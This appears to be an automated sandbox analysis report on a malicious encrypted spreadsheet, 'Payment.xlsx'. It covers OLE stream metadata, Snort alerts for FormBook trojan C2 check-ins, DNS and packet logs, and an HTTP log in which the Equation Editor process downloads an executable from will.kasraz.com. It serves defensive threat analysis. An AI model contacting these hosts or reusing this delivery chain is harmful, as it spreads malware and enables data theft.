                                                                                                                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OLE
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "Payment.xlsx"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:False
                                                                                                                                                              Application Name:unknown
                                                                                                                                                              Encrypted Document:True
                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                              Contains Workbook/Book Stream:False
                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:False

                                                                                                                                                              Streams

                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:64
                                                                                                                                                              Entropy:2.73637206947
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:112
                                                                                                                                                              Entropy:2.7597816111
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:200
                                                                                                                                                              Entropy:3.13335930328
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                              General
                                                                                                                                                              Stream Path:\x6DataSpaces/Version
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:76
                                                                                                                                                              Entropy:2.79079600998
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 1333560
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptedPackage
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:1333560
                                                                                                                                                              Entropy:7.99982132167
                                                                                                                                                              Base64 Encoded:True
                                                                                                                                                              Data ASCII:/ Y . . . . . . . . ~ ? . . ] M . . . . . T . . . * m X . . . . . . . . . . t . . . b H v . . . 9 . S . $ / 2 9 . ' X . . . b . 6 . / x . \\ < . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . . . . F . } w . w . . . D . X . .
                                                                                                                                                              Data Raw:2f 59 14 00 00 00 00 00 2e 08 7e 3f 18 e8 5d 4d 17 0f ff b5 a7 54 ec 89 fb 2a 6d 58 b5 b6 cd e3 b5 b9 9a 05 d2 a9 74 8b c1 a9 62 48 76 ba a0 d2 39 f3 53 e9 24 2f 32 39 92 27 58 cd 20 a2 e3 62 e8 36 b3 2f 78 18 5c 3c d8 92 c1 44 1f 58 11 ef 8c a1 46 82 7d 77 fa 77 d8 92 c1 44 1f 58 11 ef 8c a1 46 82 7d 77 fa 77 d8 92 c1 44 1f 58 11 ef 8c a1 46 82 7d 77 fa 77 d8 92 c1 44 1f 58 11 ef
                                                                                                                                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                              General
                                                                                                                                                              Stream Path:EncryptionInfo
                                                                                                                                                              File Type:data
                                                                                                                                                              Stream Size:224
                                                                                                                                                              Entropy:4.45948973456
                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . M . . U s T . . . l . e . . W . W . . . . . . . b 7 . . . . . . . . . C . . + + % a A . . . . . . . . . . . n ( . h . . . . . H . A
                                                                                                                                                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                              Network Behavior

                                                                                                                                                              Snort IDS Alerts

                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                              05/04/21-16:58:51.294439TCP3132WEB-CLIENT PNG large image width download attempt8049167192.3.122.177192.168.2.22
                                                                                                                                                              05/04/21-17:00:20.875209TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2266.235.200.147
                                                                                                                                                              05/04/21-17:00:20.875209TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2266.235.200.147
                                                                                                                                                              05/04/21-17:00:20.875209TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917380192.168.2.2266.235.200.147

                                                                                                                                                              Network Port Distribution

                                                                                                                                                              TCP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              May 4, 2021 16:58:50.332815886 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.469008923 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.469146967 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.469680071 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.608273983 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608302116 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608313084 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608345032 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.608370066 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.608395100 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.608397007 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.743635893 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743664980 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743678093 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743690968 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743702888 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743719101 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743731022 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743743896 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.743747950 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.743788004 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.743797064 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880028963 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880065918 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880089998 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880114079 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880125999 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880136967 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880152941 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880156994 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880163908 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880170107 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880189896 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880198002 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880213022 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880224943 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880237103 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880238056 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880261898 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880275011 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880285025 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880289078 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880307913 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880319118 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880331993 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880335093 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880358934 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880363941 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880383968 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880392075 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880407095 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:50.880415916 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.880439043 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:50.882770061 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018105984 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018131971 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018153906 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018171072 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018177986 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018198967 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018199921 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018203020 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018212080 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018220901 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018243074 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018244982 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018264055 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018273115 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018289089 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018289089 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018296957 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018311024 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018335104 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018341064 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018567085 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018591881 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018613100 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018627882 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018647909 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018652916 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018668890 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018688917 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018692017 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018712997 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018716097 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018738031 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018738985 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018748045 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018762112 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018773079 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018784046 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018799067 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018806934 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018826962 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018832922 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018846035 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018856049 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018867016 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.018877983 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.018884897 CEST4916780192.168.2.22192.3.122.177

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              May 4, 2021 16:58:50.262860060 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 16:58:50.322031975 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 16:59:57.998733044 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:03.454328060 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:03.815098047 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:09.324558973 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:09.642800093 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:15.242461920 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:20.680871010 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:20.832115889 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                              May 4, 2021 17:00:26.246644020 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                              May 4, 2021 17:00:26.539231062 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                              May 4, 2021 16:58:50.262860060 CEST192.168.2.228.8.8.80xa8c1Standard query (0)will.kasraz.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:57.998733044 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.donelys.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:03.454328060 CEST192.168.2.228.8.8.80xccffStandard query (0)www.discjockeydelraybeach.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:09.324558973 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.arfjkacsgatfzbazpdth.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.242461920 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.girlboyfriends.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:20.680871010 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.burundiacademyst.comA (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:26.246644020 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.pipienta.comA (IP address)IN (0x0001)

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                              May 4, 2021 16:58:50.322031975 CEST8.8.8.8192.168.2.220xa8c1No error (0)will.kasraz.com192.3.122.177A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.donelys.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 16:59:58.061913013 CEST8.8.8.8192.168.2.220xa14dNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:03.815098047 CEST8.8.8.8192.168.2.220xccffNo error (0)www.discjockeydelraybeach.com108.177.174.182A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:09.642800093 CEST8.8.8.8192.168.2.220x2e78No error (0)www.arfjkacsgatfzbazpdth.com103.5.116.132A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)www.girlboyfriends.comcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.156.162.121A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.225.90.193A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.210.163.104A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.204.83.175A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com3.81.223.53A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.224.148.46A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com18.205.135.125A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:15.398833036 CEST8.8.8.8192.168.2.220x2f03No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.225.3.125A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:20.832115889 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.burundiacademyst.comburundiacademyst.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:20.832115889 CEST8.8.8.8192.168.2.220x3c4eNo error (0)burundiacademyst.com66.235.200.147A (IP address)IN (0x0001)
                                                                                                                                                              May 4, 2021 17:00:26.539231062 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.pipienta.com157.7.107.165A (IP address)IN (0x0001)

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • will.kasraz.com
                                                                                                                                                              • www.donelys.com
                                                                                                                                                              • www.discjockeydelraybeach.com
                                                                                                                                                              • www.arfjkacsgatfzbazpdth.com
                                                                                                                                                              • www.girlboyfriends.com
                                                                                                                                                              • www.burundiacademyst.com
                                                                                                                                                              • www.pipienta.com

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.2249167192.3.122.17780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 16:58:50.469680071 CEST0OUTGET /a/so.exe HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                              Host: will.kasraz.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              May 4, 2021 16:58:50.608273983 CEST2INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 04 May 2021 14:58:50 GMT
                                                                                                                                                              Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
                                                                                                                                                              Last-Modified: Tue, 04 May 2021 10:00:54 GMT
                                                                                                                                                              ETag: "a2800-5c17e27600d6b"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 665600
                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-msdownload
